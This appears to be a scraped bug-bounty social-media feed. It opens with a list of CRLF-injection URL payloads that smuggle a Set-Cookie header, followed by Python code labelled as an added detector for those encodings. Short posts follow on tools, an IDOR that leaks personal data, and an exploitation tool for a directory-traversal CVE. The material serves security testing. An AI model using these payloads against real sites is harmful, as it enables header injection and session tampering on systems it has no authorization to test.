Bug Bounty Tip
CRLF Injection Attack Payload List
/%%0a0aSet-Cookie:crlf
/%0aSet-Cookie:crlf
/%0d%0aSet-Cookie:crlf
/%0dSet-Cookie:crlf
/%23%0aSet-Cookie:crlf
/%23%0d%0aSet-Cookie:crlf
/%23%0dSet-Cookie:crlf
/%25%30%61Set-Cookie:crlf
/%25%30aSet-Cookie:crlf
/%250aSet-Cookie:crlf
/%25250aSet-Cookie:crlf
/%2e%2e%2f%0d%0aSet-Cookie:crlf
/%2f%2e%2e%0d%0aSet-Cookie:crlf
/%2F..%0d%0aSet-Cookie:crlf
/%3f%0d%0aSet-Cookie:crlf
/%3f%0dSet-Cookie:crlf
/%u000aSet-Cookie:crlf
/%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
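A defender-side check for the encodings in this list, as an added example that is not part of the original post: it decodes a request path repeatedly and reports which form (plain, nested percent-encoding, `%u`, or wide characters whose low byte is CR/LF) would yield a line break, for use on access logs or before a path is reflected into a response header. The names `find_crlf`, `scan` and `SAMPLES` are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

PCT_U = re.compile(rb"%u00(?:0a|0d)", re.I)             # non-standard %uXXXX form
HEADER_AFTER_EOL = re.compile(r"[\r\n][A-Za-z0-9-]+:")  # line break, then "Name:"

def find_crlf(path, max_rounds=3):
    """Return (kind, decode_depth) if the path can yield CR/LF, else None."""
    data = path.encode("utf-8")
    if b"\r" in data or b"\n" in data:
        return ("raw", 0)
    for depth in range(1, max_rounds + 1):
        if PCT_U.search(data):
            return ("percent-u", depth)
        decoded = unquote_to_bytes(data)
        if b"\r" in decoded or b"\n" in decoded:
            return ("percent", depth)
        # A layer that narrows code points to 8 bits turns U+560D/U+560A into
        # CR/LF. Only flag when a header-like token follows, because ordinary
        # CJK text also contains characters whose low byte is 0x0A or 0x0D.
        text = decoded.decode("utf-8", "replace")
        narrowed = "".join(chr(ord(c) & 0xFF) for c in text)
        if HEADER_AFTER_EOL.search(narrowed):
            return ("unicode-low-byte", depth)
        if decoded == data:  # nothing left to decode
            break
        data = decoded
    return None

# Constructed sample paths: shapes from the list above plus one benign path.
SAMPLES = [
    "/%0d%0aSet-Cookie:crlf",
    "/%25250aSet-Cookie:crlf",
    "/%u000aSet-Cookie:crlf",
    "/%E5%98%8D%E5%98%8ASet-Cookie:crlf",
    "/docs/%E4%B8%8A%E6%B5%B7?page=2",  # benign: contains U+4E0A
]

def scan(paths):
    """Map each path to its finding (None means no CR/LF form detected)."""
    return {p: find_crlf(p) for p in paths}

if __name__ == "__main__":
    for p, hit in scan(SAMPLES).items():
        print(f"{'FLAG' if hit else 'ok  '} {hit!s:28} {p}")
```

The decode depth in the result shows how many unescape passes a proxy, framework and application would have to perform between them before the line break appears.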
YouTube
How To Restore Windows boot loader After Deleting Linux and Grub loader| H4K-XTRA
So I'm back on youtube :D
In this video I will be showing how to uninstall Linux and remove the GRUB bootloader.
Restore Windows boot loader After Deleting Linux and Grub loader
Because most of the time you find that even after uninstalling Linux the GRUB boot…
XSS Cheatsheet Burpsuite Extension https://portswigger.net/bappstore/eb75d39684b845adb457bcb050d1aa1d
InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.
Download: https://github.com/Infisical/infisical
JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.
Download: https://github.com/ifconfig-me/JScripter
#BugBounty #bugbountytips
Apepe - Mobile application pentesting
Apepe is a Python tool developed to help pentesters and red teamers easily get information from the target app. This tool will extract basic information such as the package name, whether the app is signed, and the development language...
Source - github.com/oppsec/Apepe
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.
https://github.com/honoki/bbrf-client/
IDOR in Reset Password
When the user resets his password, the application makes an API request to make sure that the username exists. If it exists, it will come back with Personal Identifying Information (PII) in the response [Full name, Email, Phone number].
By: @Maakthon
#bugbountytips
CVE-2024-40348
This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
Download: https://github.com/bigb0x/CVE-2024-40348
A Practical Guide to Starting Your Cybersecurity Career in India
Brut Security published a post on Ko-fi